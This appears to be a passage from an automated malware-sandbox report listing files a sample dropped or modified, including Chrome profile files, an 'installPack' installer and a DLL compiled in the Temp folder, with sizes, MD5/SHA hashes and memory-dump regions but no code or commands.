799188df8c807d39e7bee3c46a9e2b802ddb9079

SHA256
77a5d4b2a8acf36115678b5f372b2ada271400ee3eaa2e9600b501d1704cd99f

SHA512
c3b25a4e5e97a5f7fa5efbfafe55ee9b5004098a96054e0d84b19214b93479a9c34247f054fed54116ec16befcee90abf4a2b0d266d197084958d15e15161d84

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
2b3506fb402e985616d9bfec53328399

SHA1
dc5055c581bc8978ae10155db2d050218a1b116f

SHA256
44c5bef6a749416975926eb40d8496c8ea89a7f5c6fbffbbb7ce9e7efd8aca94

SHA512
61c7000b81247ae5e5722ec30eb31b22e143b49859eedbe269fd016192156debe3048e6b3fede1c902938dbb456915d5f3013b6532a8faee28cd05f0da5b024b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
b852c6a99fc82c3f9171013a09f80209

SHA1
fcfedf4ac3f1239ff15d56bf8732025271da3aec

SHA256
0468b0957d89fe1ecaf2799092a871fb286ea795a0e864f38fc7bfe1c866da1f

SHA512
4500d6a1fbf3c0e60f53ad0f5c8193715a448ac3e6bbed8471c75a93e2b6e8a02c56e9905a4f742cadda7af1847fe7f947b1f9107866b81a69c0b4ab28f57eb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
030ca7a0e57e101066a79980c525d309

SHA1
d9817a59231e0717363a79a52e8d38879cad8dab

SHA256
21bcc16920a0ae711c3e3a2c6d91d750e2eda0aacd9b0468c759abc22ea2fbca

SHA512
bd97f1a2d3640e741e4ffd31157d49856d92771225b0638efe2462ebd4be029ee251adb0bef9c42347c12107a03cfc5c5278f08db2caba50aae8f350a4ba9183

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\15923336-07a5-474a-81a7-c404216c9308\index-dir\the-real-index

Filesize
2KB

MD5
7dfc912aee3c11b5552a675ef664697e

SHA1
a0f0d96f5b4bb7cff33a6350763f3694c9ea265c

SHA256
210127bf72a5561026b96dd098b82807e8e5a3d271fb1bbe7ad6deb9741f1983

SHA512
99390f45780b2792bbf240ff67d64dddd6e7fa916eceb8a0a4578905b82c296133f179802021982cc3d5fef4e99509f4a13d6b3c7b52a90851ef3cd332fb2221

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\15923336-07a5-474a-81a7-c404216c9308\index-dir\the-real-index~RFe586c42.TMP

Filesize
48B

MD5
f03e6ee2cd6787bcb931acf766cf1a51

SHA1
03cfbb36ced1951b0ed87f79d7f7f81be64a592c

SHA256
99a8d816fa84a983ef76954dc773aaf4673445a1648aba2752d27f471d59c302

SHA512
36e3fd010812e7dafe20e54fc2f6956f7766b9aba8bd0c2774393e118f59ba51b6bac80cd67e15d7c1faf0ee3cc981fe3249405018ae58da398d57b5653286a6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
176B

MD5
c7ae1429d452736c954cf443884f6e56

SHA1
a8328339c0ce0d0380e66042278296ef64b4e002

SHA256
2e194e4060c1d3772b74c4b2fd4c6897c35d22d9b09db9e9525175cb017c047f

SHA512
2ea8ec3021b4025757f8ec9ae3066d193065291437b0e275e8963617aadf01a41fd1c38b1847a33ceab66ecf758fbd07ba7549a43c728fb4919aecd015cdce1b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
3d144c8581b28edfca184a0271ab6373

SHA1
6b3e1f3f2943d5769a073e0162d81d0bf78209fd

SHA256
ee5fa0801f145ae076eb487046cda5d15101fd29f4066172778f5b323547e44e

SHA512
179e5c508cb07949bbde93a8a7d996e587c5973f6b23d9f0a7b33b7c147ea49574a8c5f130aff5b2d107a0ca2bff129ce8a9c41f486b2c8c1b52f1b9f06294ea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
200B

MD5
281e5eabd0d7d2cd14f5ba362124cae4

SHA1
b0e9a79875b7767e59d878788e7ce143f1452706

SHA256
5b8e73a3dca54ac2a8fd9256073a020bc9d7942d7577593c023752b2cf1ed2a7

SHA512
15b606f164e3193c93fb8a695940f7dc02002166e120c24e6e2caeecc36f763b214c4e8f635ce07113b66653179296c8e7ff544e6a277fbb75d451f5d5f94a20

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
193B

MD5
59125fb265a72fdc095547218b552935

SHA1
bda211b9db913f0abe9b0f2ab92e1c1ea9358ec6

SHA256
555c65e2d4cd560a7f1d88b5c9781d1666adc1f0f586820ce405d02662a3b74e

SHA512
54da07c946536dd676745c76e8239490d24b119aaeeb91e38c78252db4f8979007b90059a555c31e8900a741c93919160185edb0206be45c3e41671f91152093

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe57784d.TMP

Filesize
119B

MD5
fb6ba1fd17de24caf4ceb7315967266d

SHA1
9fe9e8865d07d0cd05ee63fb1e5d7b60501aa073

SHA256
c9b634d27be73d3bce49ce36a97e812d1990cf5ce9d3b650c9ce3151adbdbee2

SHA512
0fb487f4b145b8d9cfbf46d4edf051faf37b2c567c0f0b4aff72257c24ed97a96bb9ee427c56ad41ff624a4cd8594c884f31332ab7d1ebbbe69475ca5e884628

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
847afd55cee2510f7675b69a256f6866

SHA1
4182dad2ad83e7b78060dc65f666c8c594f77eb3

SHA256
fb9f7a56f0b63092e2c14980fca41b4224a471f8455c7a2b87edc79673b2dbdf

SHA512
2195e44c0d4ac7666fdd796039d6d984ca677241ead147b4acf4a2857ca23323ec65334b6fe8e0edb3f289ce1f3c88e54694e7fb370fe0011f51701c3f260999

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
20515391a199d8026f844b96c39442f4

SHA1
fe5084135ff43a92ac84db99db674409225e824b

SHA256
57fb61cf096f70dc04e2a1a9514175c222f13612c1cc9c6212030a8ff3a556fe

SHA512
509e82456a13539bee205435e34b486633d87220a06fdfd9184daac371bdff22a89052999f9b9d61995aca9158e0ee10f412f6d099e3c118a985ac579a15a8c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57c757.TMP

Filesize
48B

MD5
4c0fc2977b9232389c607f608993216a

SHA1
ad5b7581a06f86927c8011c192d0d6caf4fb4bdb

SHA256
68fb89041003ce0cacfb412229b48347ee483a58f622d9bbdcd78473fd0f4d66

SHA512
12106037b93781a3bff0d6041a64555cf2aff621212865f07e4ad333c3a2f59cd89c0303ee8045b9f88383b3315d0a8b920e85b2275b3a20679e1906f011bc6b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
4e71ec8789bf1a8e53d8d6312c6d10af

SHA1
01a0ef96551f550cee6c27eb93a672e6df928f71

SHA256
850f9054616735f8f080def8b42595cc29e7326a89158687b87d7c245a5c4e62

SHA512
3e08b8a6d6ba8edfd83ce1de79e1043593e7163101931985ce14ce96aae3f6d3fd2ba4051f05fe217f32c1d85680d85ea25130adf1c731058001b7a1f411f245

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
816fa1f149ca105c8cd712be6d404859

SHA1
f6f559f6fac413e4155f77ea1d3c402ffa83deed

SHA256
a07ebd7036e57d6ae747f6064f172070909b4284ac86dd3ffe0605c0166e4b39

SHA512
60c82c13f8844fa5b64948341c7181bb6bdc9bcb2e4d185cff107b70f7332afcec3b701ba250f7075810f4c0f1c6eadecb7195266b3511ecfc8a271651c48e30

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
5a4a9500b4606c7e73058ba77c6e9f79

SHA1
c69aa587e45c8b8e41d68f16c1b3a47363324c12

SHA256
d4b87121994a45f89a43d42dde4eb569ec14ed5a50a5f0ddd29e272d120c273c

SHA512
b6eb2eb5985a03a1faa9744674af2f7cffc88b6f0fa8d52648e646ef7e704b2df3e9027fdf2753cbaddb94cfe7a0dbfd05bb63a02f1e47b29aba214f438d39c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\cd1c36c5-b10f-455c-b1ca-8c1a3781ebbd.tmp

Filesize
232KB

MD5
f230e87a5d8a752c469e8f7311cc8bbe

SHA1
5cf09ba319f878bf053b42a26a831eb8ed759434

SHA256
a7164ae4c59e7ef0c335f4f726da55fe826e53ad8fd12d11762bfdc661811320

SHA512
9186b2bd872b782941b519b2597b4906c67743ccb40010d0878b075ae75646aa2115b881385f5f2e9f0f2e10bdbb8d30acabb6efb00cce440c0610139c102198

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4E74.tmp

Filesize
1KB

MD5
12125f902cf73c67ecf976b185cf0c16

SHA1
70075ccfa63262e87dcd3f68f1ca5f79d87a3248

SHA256
b04737d3dc05380777bef4243b3da0fce5826e02f5430e670f60bf6b00f3a6ad

SHA512
706e8bfebc8cc6aa234d49e31aadeb7ec71e0221dc03023f8b82f776b849ade281545e62e072a046f66017b164cbd0cb35bd2bd7817bdbae143d9c933c88c3c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4xc3rr4m.cbm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fcg12s4p\fcg12s4p.dll

Filesize
9KB

MD5
f17d3ac2b5804d600228162fc74e0402

SHA1
0bf3d32b7657274c60b01e81d2fd2499f08197ee

SHA256
347667b1d873ccafc375ef0fc506855a631a5ead30bd1cff71485be037c3a3ad

SHA512
750ce4a858c8636153bce2927eabbaf200c7dced6f718655a281f6a3ffe6f86475b270ab0bab3d0952a2b5ce9c121b66d496194bad1d47909eb47ecd1f39e4fb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\Downloads\installPack.zip

Filesize
11.5MB

MD5
6ecc93dbed26060b2bfe11a57f5ccff9

SHA1
73a4d021ec691344b073cce2e10f10eefb3ef283

SHA256
644f71f21f44b8e2b4ff567fe7a85048b2615d27b310d7b2ce605606cc21f37d

SHA512
ab42e0db06b20604be84d461ca0f6a97a2b31b222266ea29fecc45c90f2caad74a0f2c3590322be90395f9879e72c5f315dd01d7006aaf5ecf5c59563c664f18

Download Submit
C:\Users\Admin\Downloads\installPack\IVIEWERS.DLL

Filesize
91KB

MD5
c27b1011b80cd0577d549091f301392d

SHA1
9d3b38adfce4de9612d44a8d86b2e186e90605a7

SHA256
c846fa8899a6b38454d7d134fcb688e2afedf8aa28d14f9bc26bbed6fd0c0f36

SHA512
819b9f73573eb7d30aa597aebb78c00c0bfda33c1bde46689e5807761d98599ee80099b9147cfe83ad81ca46fca04c9d2ea1da71fccb17a79e02337aedf5f4c9

Download Submit
C:\Users\Admin\Downloads\installPack\der\Reg2.dll

Filesize
3.5MB

MD5
db42960677c6856f32e5ede6f11eedd9

SHA1
aac553bc5abbd03fb58e608d453f5177b1a80575

SHA256
1f0be341ef1ea8b699234de9ebae939fe59c59bd8598df992a13bb92c5800166

SHA512
00af77ac19942eac57b114b5148f08e175edcfbe811b5d2e5ddca9555d9e64518c4310ea7031432cb46cd0d8f27c2732f86aafe3afe7341d8e718c424cccdb2f

Download Submit
C:\Users\Admin\Downloads\installPack\installer.exe

Filesize
201KB

MD5
2696d944ffbef69510b0c826446fd748

SHA1
e4106861076981799719876019fe5224eac2655c

SHA256
a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a

SHA512
c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fcg12s4p\CSC778EDA0966594B068AEA81C0ECE4D.TMP

Filesize
652B

MD5
d797bcf17d25995b68a86862ab15759a

SHA1
7baa68e0496db6fb266c67dfed166a6b679ca8dc

SHA256
93296d2276fdee313e2fec6018de9b67d4f36b3223e502ac10b60cb9ee082c33

SHA512
ea58a4af65ccc11be5dc0d8ee2b01ca8a61b2ee0c32347b9b033db479389e8effb5c01f0c33d7eb2779c23f87106cd6ecb353fc2347896dcbcca4b8f5953c68c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fcg12s4p\fcg12s4p.0.cs

Filesize
10KB

MD5
5681df33eb5a6323321e8da011e8a17a

SHA1
e146d7b8349c58efffa62c10c56ccb72bb058319

SHA256
a5bc39d59618ab5901840b886ded08c7ec503c351f54684c287bbacd55dd01b5

SHA512
081800391e637a9b8386781077dee9ae55155a659e855b07dc2645fa80d097213fed93180a6188741af7e95c5568a7ccba1aa0bc964478cde0a56269e45d8a72

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fcg12s4p\fcg12s4p.cmdline

Filesize
204B

MD5
8612156bfc36437eb103c5ca837b2a0f

SHA1
fc2ca1ba03d4f96f8b0376a83059968ed93e1056

SHA256
0799afc395c4aea717e15d907c3cad81f000772656adb679e28f7afafafd4d93

SHA512
6b3ff890e84764487aeadc16114f9fdfa7bac57cdb9be5443a820bd52594b6db98f3fa23416e90a74d5e48ebdc2a097d28aa46886bbb5c76fea87a03543195fb

Download Submit
memory/1180-750-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/1180-751-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/2052-741-0x00000000079B0000-0x00000000079B8000-memory.dmp

Filesize
32KB

Download
memory/2052-728-0x0000000007860000-0x0000000007870000-memory.dmp

Filesize
64KB

Download
memory/2052-727-0x0000000007760000-0x000000000777A000-memory.dmp

Filesize
104KB

Download
memory/2052-726-0x0000000007DC0000-0x000000000843A000-memory.dmp

Filesize
6.5MB

Download
memory/2052-725-0x00000000076C0000-0x0000000007736000-memory.dmp

Filesize
472KB

Download
memory/2052-724-0x0000000006970000-0x00000000069B4000-memory.dmp

Filesize
272KB

Download
memory/2052-723-0x0000000006440000-0x000000000648C000-memory.dmp

Filesize
304KB

Download
memory/2052-722-0x00000000063C0000-0x00000000063DE000-memory.dmp

Filesize
120KB

Download
memory/2052-721-0x0000000005ED0000-0x0000000006227000-memory.dmp

Filesize
3.3MB

Download
memory/2052-708-0x0000000005D60000-0x0000000005DC6000-memory.dmp

Filesize
408KB

Download
memory/2052-707-0x0000000005CF0000-0x0000000005D56000-memory.dmp

Filesize
408KB

Download
memory/2052-706-0x0000000005C30000-0x0000000005C52000-memory.dmp

Filesize
136KB

Download
memory/2052-705-0x00000000054B0000-0x0000000005B7A000-memory.dmp

Filesize
6.8MB

Download
memory/2052-704-0x0000000004DA0000-0x0000000004DD6000-memory.dmp

Filesize
216KB

Download